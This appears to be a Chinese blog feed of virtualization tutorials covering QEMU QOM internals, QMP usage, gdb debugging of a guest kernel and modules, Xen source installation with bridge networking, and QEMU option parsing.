<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void object_instance_init(Object *obj)
{
object_property_add_str(obj, "type", qdev_get_type, NULL, NULL);
}
static void device_initfn(Object *obj)
{
DeviceState *dev = DEVICE(obj);
ObjectClass *class;
Property *prop;
if (qdev_hotplug) {
dev->hotplugged = 1;
qdev_hot_added = true;
}
dev->instance_id_alias = -1;
dev->realized = false;
object_property_add_bool(obj, "realized",
device_get_realized, device_set_realized, NULL);
object_property_add_bool(obj, "hotpluggable",
device_get_hotpluggable, NULL, NULL);
object_property_add_bool(obj, "hotplugged",
device_get_hotplugged, device_set_hotplugged,
&error_abort);
class = object_get_class(OBJECT(dev));
do {
for (prop = DEVICE_CLASS(class)->props; prop && prop->name; prop++) {
qdev_property_add_legacy(dev, prop, &error_abort);
qdev_property_add_static(dev, prop, &error_abort);
}
class = object_class_get_parent(class);
} while (class != object_class_by_name(TYPE_DEVICE));
object_property_add_link(OBJECT(dev), "parent_bus", TYPE_BUS,
(Object **)&dev->parent_bus, NULL, 0,
&error_abort);
QLIST_INIT(&dev->gpios);
}
</code></pre></div></div>
<p>可以看到主要就是给对象添加了一些属性,object的type属性啊,device里面的realized、hotpluggable属性等,值得注意的是device_initfn还根据class->props添加的添加了属性,
在vmxnet3_class_init函数中,我们可以看到,在class被初始化的时候,其已经赋值vmxnet3_properties,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static Property vmxnet3_properties[] = {
DEFINE_NIC_PROPERTIES(VMXNET3State, conf),
DEFINE_PROP_BIT("x-old-msi-offsets", VMXNET3State, compat_flags,
VMXNET3_COMPAT_FLAG_OLD_MSI_OFFSETS_BIT, false),
DEFINE_PROP_BIT("x-disable-pcie", VMXNET3State, compat_flags,
VMXNET3_COMPAT_FLAG_DISABLE_PCIE_BIT, false),
DEFINE_PROP_END_OF_LIST(),
};
</code></pre></div></div>
<p>这样,object_new之后,创建的object其实已经具有了很多属性了,这是从父object那里继承过来的。</p>
<p>接着看qdev_device_add函数,调用了object_property_set_bool</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>object_property_set_bool->object_property_set_qobject->object_property_set->property_set_bool->device_set_realized->vmxnet3_realize
</code></pre></div></div>
<p>最终,我们的vmxnet3_realize函数被调用了,这也就完成了object的构造,不同于type和class的构造,object当然是根据需要创建的,只有在命令行指定了设备或者是热插一个设备之后才会有object的创建。Class和object之间是通过Object的class域联系在一起的。如下图所示。</p>
<p><img src="/assets/img/qom/3.png" alt="" /></p>
<h2 id="第五节">五. 总结</h2>
<p>从上文可以看出,我把QOM的对象构造分成三部分,第一部分是type的构造,这是通过TypeInfo构造一个TypeImpl的哈希表,这是在main之前完成的,第二部分是class的构造,这是在main中进行的,这两部分都是全局的,也就是只要编译进去了的QOM对象都会调用,第三部分是object的构造,这是构造具体的对象实例,在命令行指定了对应的设备时,才会创建object。从上上面也可以看出,正如Paolo Bonzini所说的,qemu在object方面的多态是一种class based的,而属性方面,是动态构造的,每个实例可能都有不同的属性,这是一种prototype based的多态。</p>
<p>本文主要是对整个对象的产生做了介绍,没有对interface和property做过多介绍,maybe以后又机会再详细说吧。</p>
<h2 id="后记">后记</h2>
<p>这篇文章很早很早以前就说写了,15年还在学校就应该写的,结果今年忙于挖洞,一直就拖啊拖的,一直到现在终于把这个坑填上,鄙视一下自己,自己已经准备了好多qemu内容,一直没有时间填坑,希望有时间都填上。</p>
<h2>参考</h2>
<ol>
<li><a href="http://mnstory.net/2014/10/qemu-device-simulation/">QEMU设备模拟</a></li>
<li>QOM exegesis and apocalypse, Paolo Bonzini, KVM Forum 2014</li>
</ol>
QMP简介2016-07-22T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/07/22/qmp-introduction
<p>QMP是一种基于JSON格式的传输协议,可以用于与虚拟机的交互,比如查询虚拟机的内部状态,进行设备的热插拔等。</p>
<p>有多种方法使用qmp,这里简要介绍通过tcp和unix socket使用qmp。</p>
<h3>通过TCP使用QMP</h3>
<p>使用-qmp添加qmp相关参数:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./qemu-system-x86_64 -m 2048 -hda /root/centos6.img -enable-kvm -qmp tcp:localhost:1234,server,nowait
</code></pre></div></div>
<p>使用telnet连接localhost:1234</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>telnet localhost 1234
</code></pre></div></div>
<p>之后就可以使用qmp的命令和虚拟机交互了</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost ~]# telnet localhost 1234
Trying ::1...
Connected to localhost.
Escape character is '^]'.
{"QMP": {"version": {"qemu": {"micro": 0, "minor": 6, "major": 2}, "package": ""}, "capabilities": []}}
{ "execute": "qmp_capabilities" }
{"return": {}}
{ "execute": "query-status" }
{"return": {"status": "running", "singlestep": false, "running": true}}
</code></pre></div></div>
<h3>通过unix socket使用QMP</h3>
<p>使用unix socket创建qmp:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./qemu-system-x86_64 -m 2048 -hda /root/centos6.img -enable-kvm -qmp unix:/tmp/qmp-test,server,nowait
</code></pre></div></div>
<p>使用nc连接该socket:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc -U /tmp/qmp-test
</code></pre></div></div>
<p>之后就一样了。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost qmp]# nc -U /tmp/qmp-test
{"QMP": {"version": {"qemu": {"micro": 0, "minor": 6, "major": 2}, "package": ""}, "capabilities": []}}
{ "execute": "qmp_capabilities" }
{"return": {}}
{ "execute": "query-status" }
{"return": {"status": "running", "singlestep": false, "running": true}}
</code></pre></div></div>
<p>QMP的详细命令格式可以在qemu的代码树主目录下面的qmp-commands.hx中找到。</p>
<h3>自动批量发送QMP命令</h3>
<p>可以通过<a href="https://gist.github.com/sibiaoluo/9798832">这里</a>的方法向虚拟机自动批量的发送QMP命令,这对于测试虚拟机的一些功能是很有用的。试了一下,对于unix socket的方法使能够使用的,对于tcp连接的方法没有使用成功。
为了防止连接失效,代码附在下面:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># QEMU Monitor Protocol Python class
#
# Copyright (C) 2009 Red Hat Inc.
#
# This work is licensed under the terms of the GNU GPL, version 2. See
# the COPYING file in the top-level directory.
import socket, json, time, commands
from optparse import OptionParser
class QMPError(Exception):
pass
class QMPConnectError(QMPError):
pass
class QEMUMonitorProtocol:
def connect(self):
print self.filename
self.sock.connect(self.filename)
data = self.__json_read()
if data == None:
raise QMPConnectError
if not data.has_key('QMP'):
raise QMPConnectError
return data['QMP']['capabilities']
def close(self):
self.sock.close()
def send_raw(self, line):
self.sock.send(str(line))
return self.__json_read()
def send(self, cmdline, timeout=30, convert=True):
end_time = time.time() + timeout
if convert:
cmd = self.__build_cmd(cmdline)
else:
cmd = cmdline
print("*cmdline = %s" % cmd)
print cmd
self.__json_send(cmd)
while time.time() < end_time:
resp = self.__json_read()
if resp == None:
return (False, None)
elif resp.has_key('error'):
return (False, resp['error'])
elif resp.has_key('return'):
return (True, resp['return'])
def read(self, timeout=30):
o = ""
end_time = time.time() + timeout
while time.time() < end_time:
try:
o += self.sock.recv(1024)
if len(o) > 0:
break
except:
time.sleep(0.01)
if len(o) > 0:
return json.loads(o)
else:
return None
def __build_cmd(self, cmdline):
cmdargs = cmdline.split()
qmpcmd = { 'execute': cmdargs[0], 'arguments': {} }
for arg in cmdargs[1:]:
opt = arg.split('=')
try:
value = int(opt[1])
except ValueError:
value = opt[1]
qmpcmd['arguments'][opt[0]] = value
print("*cmdline = %s" % cmdline)
return qmpcmd
def __json_send(self, cmd):
# XXX: We have to send any additional char, otherwise
# the Server won't read our input
self.sock.send(json.dumps(cmd) + ' ')
def __json_read(self):
try:
return json.loads(self.sock.recv(1024))
except ValueError:
return
def __init__(self, filename, protocol="tcp"):
if protocol == "tcp":
self.filename = ("localhost", int(filename))
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
elif protocol == "unix":
self.filename = filename
print self.filename
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
#self.sock.setblocking(0)
self.sock.settimeout(5)
if __name__ == "__main__":
parser = OptionParser()
parser.add_option('-n', '--num', dest='num', default='10', help='Times want to try')
parser.add_option('-f', '--file', dest='port', default='4444', help='QMP port/filename')
parser.add_option('-p', '--protocol', dest='protocol',default='tcp', help='QMP protocol')
def usage():
parser.print_help()
sys.exit(1)
options, args = parser.parse_args()
print options
if len(args) > 0:
usage()
num = int(options.num)
qmp_filename = options.port
qmp_protocol = options.protocol
qmp_socket = QEMUMonitorProtocol(qmp_filename,qmp_protocol)
qmp_socket.connect()
qmp_socket.send("qmp_capabilities")
qmp_socket.close()
##########################################################
#Usage
#Options:
# -h, --help show this help message and exit
# -n NUM, --num=NUM Times want to try
# -f PORT, --file=PORT QMP port/filename
# -p PROTOCOL, --protocol=PROTOCOL
# QMP protocol
# e.g: # python xxxxx.py -n $NUM -f $PORT
##########################################################
</code></pre></div></div>
通过QEMU调试Linux内核2016-06-21T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/06/21/gdb-linux-kernel-by-qemu
<h3>前言</h3>
<p>相信从Windows内核转到Linux内核的人最开始都会对Windows的内核调试机制非常怀念,在Linux的远古时代调试内核是非常不方便的,或者需要打kgdb的补丁,或者多用用printk也能把问题解决了。当我刚开始接触虚拟化的时候就意识到这绝对是双机调试的绝佳场景,果然很快就在网上找到了通过QEMU调试Linux内核的文章。之前由于种种原因一直没有时间和机会尝试,最近终于下定决心搞定他,开始折腾了几天。鉴于网上的材料千篇一律,并且很多的坑都没有提到,写了这篇文章,希望能够帮助有需要的人。我对于QEMU和KVM还是区分得很开的,QEMU是虚拟化软件,KVM是内核模块用于QEMU的加速,代码的native执行。文中提到的QEMU虚拟机默认都是用了KVM加速的。</p>
<p>本文环境:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>VMWare中的一台CentOS 7 x64作为宿主机
QEMU虚拟机是CentOS 6.7 x64
虚拟机内核源码版本:3.18.35
</code></pre></div></div>
<p>文末提供了使用的内核模块源码,最简单的hello world Linux驱动版。</p>
<h3>虚拟机创建</h3>
<p>为了简单起见,使用libvirt的方式安装虚拟化环境</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>yum install qemu-kvm qemu-img virt-manager libvirt libvirt-python libvirt-client virt-install virt-viewer
</code></pre></div></div>
<p>接着使用virt-manager创建虚拟机。</p>
<p>在创建好虚拟机之后,在<a href="https://www.kernel.org/">内核官网</a>下载内核源码,我用的版本是3.18.35,修改根目录下面的Makefile文件
将617行”-O3”改为”-O1”。当然,-O0是最好的,但是如<a href="http://www.ibm.com/developerworks/cn/linux/1508_zhangdw_gdb/index.html">此文</a>中所说,-O0有一个bug,3.18.35版本也是编译会出问题。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ifdef CONFIG_CC_OPTIMIZE_FOR_SIZE
KBUILD_CFLAGS += -Os $(call cc-disable-warning,maybe-uninitialized,)
else
KBUILD_CFLAGS += -O1//修改此处
</code></pre></div></div>
<p>之后更换虚拟机中的内核,注意KGDB的配置,似乎是默认就有的。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>make menuconfig
make
make modules_install
make install
</code></pre></div></div>
<p>这样就替换了QEMU虚拟机中的内核了。</p>
<h3>修改虚拟机配置文件</h3>
<p>为了支持qemu虚拟机调试,需要通过libvirt传递命令行参数给qemu进程。
具体如下修改:
使用virsh list从第二列得到虚拟机名字,通过virsh edit <vm_name>即可修改虚拟机配置文件。
注意修改主要是两处:</vm_name></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><domain type='kvm' xmlns:qemu='http://libvirt.org/schemas/domain/qemu/1.0'>
</code></pre></div></div>
<p>这是通过libvirt向qemu传递参数所必须的。</p>
<p>在最后一个节点devices之后添加qemu:commandline节点,注意一定要在最后。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <qemu:commandline>
<qemu:arg value='-S'/>
<qemu:arg value='-gdb'/>
<qemu:arg value='tcp::1234'/>
</qemu:commandline>
</code></pre></div></div>
<h3>调试QEMU虚拟机模块</h3>
<p>首先需要在宿主机的创建一个与虚拟机中目录一样的Linux内核代码树,为了方便,虚拟机中内核源码在/root/linux-3.18.35目录下,可以直接使用:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>scp -r linux-3.18.35 root@192.168.122.1:/root
</code></pre></div></div>
<p>这样,虚拟机就和宿主机中的访问路径一样了,对于内核模块同样如此。</p>
<p>在宿主机中启动gdb,监听端口,在virt-manager中开启虚拟机,可以看到虚拟机被断下来了,在这里先讨论模块的调试,因为内核的调试还有坑,后面再谈,直接c运行虚拟机。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[root@localhost gdb]# ./gdb ~/linux-3.18.35/vmlinux
GNU gdb (GDB) 7.9
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-unknown-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /root/linux-3.18.35/vmlinux...done.
(gdb) target remote localhost:1234
Remote debugging using localhost:1234
0x0000000000000000 in irq_stack_union ()
(gdb)
</code></pre></div></div>
<p>当使用ctrl-c断下虚拟机时,可能会出现</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Remote 'g' packet reply is too long
</code></pre></div></div>
<p>可以在<a href="https://sourceware.org/bugzilla/show_bug.cgi?id=13984">这里</a>找到一个patch,打上就好了。</p>
<p>在do_init_module下断点之后,在虚拟机中insmod poc.ko,可以看到虚拟机已经被断下来了,参数mod->sect_attrs->attrs放的是各个section的信息,在这个hello world的驱动中,只有.text信息,并没有.bss和.data,我们需要将这些信息提供给gdb。使用如下命令即可:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>add-symbol-file xxx.ko <text addr> -s .data <data addr> -s .bss <bss addr>
</code></pre></div></div>
<p>之后就可以在模块中进行单步调试了。整个过程如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>^C
Program received signal SIGINT, Interrupt.
default_idle () at arch/x86/kernel/process.c:316
warning: Source file is more recent than executable.
316 trace_cpu_idle_rcuidle(PWR_EVENT_EXIT, smp_processor_id());
(gdb) b do_init_module
Breakpoint 1 at 0xffffffff810c5c0e: file kernel/module.c, line 3043.
(gdb) c
Continuing.
Breakpoint 1, do_init_module (mod=0xffffffffa02010e0) at kernel/module.c:3043
warning: Source file is more recent than executable.
3043 current->flags &= ~PF_USED_ASYNC;
(gdb) p /x mod->sect_attrs->attrs[1]->address
$1 = 0xffffffffa0201000
(gdb) add-symbol-file ~/hello/poc.ko 0xffffffffa0201000
add symbol table from file "/root/hello/poc.ko" at
.text_addr = 0xffffffffa0201000
(y or n) y
Reading symbols from /root/hello/poc.ko...done.
(gdb) b hello_init
Breakpoint 2 at 0xffffffffa020100d: file /root/hello/poc.c, line 7.
(gdb) c
Continuing.
Breakpoint 2, hello_init () at /root/hello/poc.c:7
7 struct task_struct *ts = current;
(gdb) n
p t8 printk("hello,world,%s\n",current->comm);
(gdb) p ts
$2 = (struct task_struct *) 0xffff88003c0b2190
(gdb) p ts->pid
$3 = 2629
(gdb) p ts->comm
$4 = "insmod\000erminal\000"
(gdb) n
9 ts = NULL;
(gdb) n
10 ts->pid=123;
(gdb) p ts
$5 = (struct task_struct *) 0x0 <irq_stack_union>
(gdb) p ts->pid
Cannot access memory at address 0x7f0
(gdb) n
</code></pre></div></div>
<h3>调试虚拟机内核</h3>
<p>上面的过程是调试可加载模块的方法,很多文章都说直接在虚拟机连过来的时候b start_kernel就可以调试内核了,然而真实情况并不是,你会看到虚拟机根本不会在这个断点停留,也不会在内核代码中的其他断点停留。</p>
<p>找了好久终于在<a href="https://bugs.launchpad.net/ubuntu/+source/qemu-kvm/+bug/901944">这里</a>找到了答案,一句话:需要下硬件断点才行。之后就可以下软断点了。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) target remote localhost:1234
Remote debugging using localhost:1234
0x0000000000000000 in irq_stack_union ()
(gdb) hb start_kernel//硬件断点
Hardware assisted breakpoint 1 at 0xffffffff81b40044: file init/main.c, line 501.
(gdb) c
Continuing.
Breakpoint 1, start_kernel () at init/main.c:501
warning: Source file is more recent than executable.
501 {
(gdb) n
510 set_task_stack_end_magic(&init_task);
(gdb) n
511 smp_setup_processor_id();
(gdb) p init_task
$1 = {state = 0, stack = 0xffffffff81a00000 <init_thread_union>, usage = {
...
(gdb) b security_init
Breakpoint 2 at 0xffffffff81b6ff8a: file security/security.c, line 67.
(gdb) c
Continuing.
Breakpoint 2, security_init () at security/security.c:67
warning: Source file is more recent than executable.
67 printk(KERN_INFO "Security Framework initialized\n");
(gdb)
</code></pre></div></div>
<p>使用的hello world Linux驱动源码</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <linux/init.h>
#include <linux/module.h>
#include <linux/sched.h>
static int hello_init(void)
{
struct task_struct *ts = current;
printk("hello,world,%s\n",current->comm);
ts = NULL;
ts->pid=123;
return 0;
}
static void hello_exit(void)
{
printk("goodbye,world\n");
}
module_init(hello_init);
module_exit(hello_exit);
</code></pre></div></div>
<p>Makefile文件,注意-O0不优化</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-m := poc.o
KDIR :=/lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
ccflags-y = -O0
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
</code></pre></div></div>
<h3>注意事项</h3>
<ol>
<li>宿主机和虚拟机中的目录要一致,内核和自己添加的模块都需要</li>
<li>gdb记得打补丁</li>
<li>调试内核代码的时候最开始记得用硬件断点</li>
</ol>
<h3>参考</h3>
<ol>
<li><a href="http://www.ibm.com/developerworks/cn/linux/1508_zhangdw_gdb/index.html">使用 GDB 和 KVM 调试 Linux 内核与模块</a></li>
<li><a href="http://blog.vmsplice.net/2011/04/how-to-pass-qemu-command-line-options.html">How to pass QEMU command-line options through libvirt</a></li>
<li><a href="https://bugs.launchpad.net/ubuntu/+source/qemu-kvm/+bug/901944">gdbserver inside qemu does not stop on breakpoints</a></li>
<li><a href="https://sourceware.org/bugzilla/show_bug.cgi?id=13984">Bug 13984 - gdb stops controlling a thread after “Remote ‘g’ packet reply is too long: …” error message</a></li>
</ol>
CentOS 6.7为Xen 4.5虚拟机搭建桥接网络2016-05-13T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/05/13/centos6xen4.5-bridge
<h3>前言</h3>
<p>上一篇文章<a href="http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/04/26/centos6xen4.5">CentOS 6.7源码安装Xen</a>讨论了从源码安装Xen的问题。但是这样安装好的Xen,创建虚拟机并不能使用网络,这篇文章就是为Xen虚拟机搭建桥接网络。</p>
<h3>使用network替换NetworkManager</h3>
<p>CentOS 6.7的网络管理服务NetworkManager不支持桥接,所以需要把NetworkManager换成network。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>chkconfig NetworkManager off
chkconfig network on
service NetworkManager stop
service network start
</code></pre></div></div>
<p>之后在/etc/sysconfig/network-scripts目录下添加ifcfg-eth0文件,文件内容如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DEVICE=eth0
ONBOOT=yes
BOOTPROTO=dhcp
NM_CONTROLLED=no
</code></pre></div></div>
<p>service network restart之后就使用network了。</p>
<h3>添加xenbr0</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>brctl addbr xenbr0
</code></pre></div></div>
<p>修改/etc/sysconfig/network-scripts/ifcfg-eth0</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DEVICE=eth0
ONBOOT=yes
BOOTPROTO=dhcp
NM_CONTROLLED=no
BRIDGE=xenbr0
</code></pre></div></div>
<p>添加文件/etc/sysconfig/network-scripts/ifcfg-xenbr0</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DEVICE=xenbr0
TYPE=bridge
ONBOOT=yes
BOOTPROTO=dhcp
NM_CONTROLLED=no
</code></pre></div></div>
<p>之后sercie network restart重启网络,在虚拟机配置文件中使用
vif = [‘mac=00:01:02:03:04:05,bridge=xenbr0’]就不会报错了,Xen虚拟机也能上网了。再把虚拟机里面的内核替换掉,就可以做到自主编译,自主可控了,哈哈。</p>
CentOS 6.7源码安装Xen2016-04-26T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2016/04/26/centos6xen4.5
<h3>前言</h3>
<p>一直习惯了QEMU && KVM组合,最近准备尝试一下Xen,遇到了很多坑,为了方便他人少踩坑,所以写了此文。回首编译Xen的过程,也就不难理解当年社区为啥不看好Xen了,QEMU && KVM的结构不仅从架构上来简单清晰,安装使用也很方便,反观Xen,各种坑。不过自己躺一遍这些坑倒是能够提高一下耐心和对Xen的理解。</p>
<h3>环境</h3>
<ol>
<li>Dom0:CentOS 6.7 x64,kernel version:3.18.24</li>
<li>Xen:4.5.4</li>
</ol>
<h3>相关软件安装</h3>
<p>可以从<a href="http://wiki.xenproject.org/wiki/Compiling_Xen_From_Source">Compiling Xen From Source</a>文中找到,具体如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>yum groupinstall "Development Tools"
yum-builddep xen
yum install transfig wget tar less texi2html libaio-devel dev86 glibc-devel e2fsprogs-devel gitk mkinitrd iasl xz-devel bzip2-devel
yum install pciutils-libs pciutils-devel SDL-devel libX11-devel gtk2-devel bridge-utils PyXML qemu-common qemu-img mercurial texinfo
yum install libidn-devel yajl yajl-devel ocaml ocaml-findlib ocaml-findlib-devel python-devel uuid-devel libuuid-devel openssl-devel
yum install python-markdown pandoc systemd-devel glibc-devel.i686
</code></pre></div></div>
<p>安装dev86如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget http://mirror.centos.org/centos/6/os/x86_64/Packages/dev86-0.16.17-15.1.el6.x86_64.rpm
rpm -ivh dev86-0.16.17-15.1.el6.x86_64.rpm
</code></pre></div></div>
<h3>安装Xen</h3>
<p>可从<a href="http://www.xenproject.org/">Xen官网</a>或者使用git下载,使用如下命令编译安装Xen</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./configure --prefix=/usr
make dist
make install
ldconfig
</code></pre></div></div>
<p>此时在/boot下面应该已经会有Xen的内核了,之前卡在这里就是在CentOS7下面编译Xen老是提示一个错误”set sse instruction disable”,然后折腾了好久,后来实在搞不定就换成6.7了,开源的东西伤不起,估计跟gdb的sse编译选项有关。</p>
<h3>安装Dom0内核</h3>
<p>这个用新一点的,Linux版本都4.x了,总不能还用2.6的吧内核,主要是早期对Xen支持不行,我用的是3.18。</p>
<p>make menuconfig进去之后死活找不到Xen的相关选项。特别是vpsee的那边流传甚广的文章对此也没有说清楚,可能是人家太熟悉了,直接滤过,导致走了不少弯路。后来才在官网找到了(所以,大家不要偷懒,该看文档还是要老老实实看)</p>
<p>make menuconfig进入配置界面之后,因为有一些依赖关系,所以最重要的首先需要在</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Processor type and features | Linux guest support
</code></pre></div></div>
<p>打开,一股脑儿把这下面的都打开。后面的各种Xen选项就开了,Xen支持的几个选项是在以下几个项目中:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Processor type and features | Linux guest support
Device Drivers | Character devices
Device Drivers | Block device
Device Drivers | Network device support
Device Drivers | Xen driver support
</code></pre></div></div>
<p>把上面与Xen有关的都最后还有一个CONFIG_CLEANCACHE和CONFIG_FRONTSWAP的选项也是在Processor Type and features,这里有个小tips就是在make menuconfig之后,直接输入”/”输入相关的关键字就可以查找对应的选项在哪个配置项里面。配置完了之后记得对照<a href="http://wiki.xenproject.org/wiki/Mainline_Linux_Kernel_Configs">Mainline Linux Kernel Configs</a>上面的检查一下。之后就可以愉快的编译内核了</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>make
make modules_install
make install
</code></pre></div></div>
<h3>添加启动条目</h3>
<p>内核安装完了之后,在/boot下面就应该能够看见新内核的镜像了,在/boot/grub/menu.lst下面应该也会有一个新的启动项,复制新内核的启动条目放到最后,将root下面添加一行</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kernel /xen-4.5.gz
</code></pre></div></div>
<p>之前的kernel和initrd都改成module,更改后类似下面这样</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>title Xen
root(hd0,0)
kernel /xen-4.5.gz
module /vmlinuz-3.18.24 xxxxxxxxxx
module /initramfs-3.18.24.img
</code></pre></div></div>
<h3>其他</h3>
<p>重启之后选择Xen启动,进入系统使用使用xl命令可能还会有错,如果是so找不到可以找到安装目录做一个软连接,如果是</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xc: error: Could not obtain handle on privileged command interface (2 = No such file or directory): Internal error
</code></pre></div></div>
<p>需要再/etc/fstab中添加一行</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>none /proc/xen xenfs defaults 0 0
</code></pre></div></div>
<p>最后记得把xencommons设为开机启动</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>chkconfig --level 5 xencommons on
</code></pre></div></div>
<h3>参考</h3>
<ol>
<li><a href="http://wiki.xenproject.org/wiki/Compiling_Xen_From_Source">Compiling Xen From Source</a></li>
<li><a href="http://wiki.xenproject.org/wiki/Mainline_Linux_Kernel_Configs">Mainline Linux Kernel Configs</a></li>
<li><a href="http://www.vpsee.com/2014/07/compile-and-install-xen-from-source-code-on-centos-7-0/">在 CentOS 7.0 上源码安装 Xen 4.5</a></li>
</ol>
QEMU参数解析2015-09-26T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2015/09/26/qemu-options
<h3>前言</h3>
<p>快毕业了,准备把虚拟化的东西都整理一下,准备开始新的旅程。希望这是一个系列,主要涉及虚拟化的理论与实践,包括但不限于理论基础、源码分析、外文翻译以及Demo实例。本篇文章首先分析一下QEMU的参数解析部分。</p>
<h3>一. 使用gdb分析QEMU代码</h3>
<ol>
<li>使用configure生成Makefile的时候指定参数包括–enable-kvm –enable-debug –target-list=”x86_64-softmmu”</li>
<li>从QEMU官方下载一个精简镜像linux-0.2.img
wget http://wiki.qemu.org/download/linux-0.2.img.bz2</li>
<li>
<p>启动gdb调试QEMU命令</p>
<p>gdb –args /usr/bin/bin/qemu-system-x86_64 linux-0.2.img -m 512 -enable-kvm -smp 1,sockets=1,cores=1,threads=1 -realtime mlock=off -device ivshmem,shm=ivshmem,size=1 -device ivshmem,shm=ivshmem1,size=2</p>
</li>
</ol>
<p>这里使用了这么多参数,主要是为了之后对QEMU解析参数有比较好的理解。</p>
<h3>二. QEMU参数解析</h3>
<p>QEMU定义了QEMUOption来表示QEMU程序的参数选项。定义如下</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct QEMUOption {
const char *name;
int flags;
int index;
uint32_t arch_mask;
} QEMUOption;
</code></pre></div></div>
<p>vl.c中在全局范围定义了一个qemu_options存储了所有的可用选项。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const QEMUOption qemu_options[] = {
{ "h", 0, QEMU_OPTION_h, QEMU_ARCH_ALL },
#define QEMU_OPTIONS_GENERATE_OPTIONS
#include "qemu-options-wrapper.h"
{ NULL },
};
</code></pre></div></div>
<p>qemu_options的生成使用QEMU_OPTIONS_GENERATE_OPTIONS编译控制以及一个文件qemu-options-wrapper.h填充。在qemu-options-wrapper.h中,根据是否定义QEMU_OPTIONS_GENERATE_ENUM、QEMU_OPTIONS_GENERATE_HELP以及QEMU_OPTIONS_GENERATE_OPTIONS以及qemu-options.def文件可以生成不同的内容。qemu-options.def是在Makefile中利用scripts/hxtool脚本根据qemu-options.hx文件生成的。</p>
<p>在这里只需要理解,qemu_options中包括了所有可能的参数选项,比如上面的-enable-kvm -smp -realtime -device等。</p>
<p>QEMU将所有参数分成了几个大选项,比如-eanble-kvm和-kernel都属于machine相关的,
每一个大选项使用QemuOptsList表示,QEMU在qemu-config.c中定义了</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static QemuOptsList *vm_config_groups[48];
</code></pre></div></div>
<p>这表示可以支持48个大选项。
在main函数中用qemu_add_opts将各个QemuOptsList添加到vm_config_groups中</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> qemu_add_opts(&qemu_drive_opts);
qemu_add_drive_opts(&qemu_legacy_drive_opts);
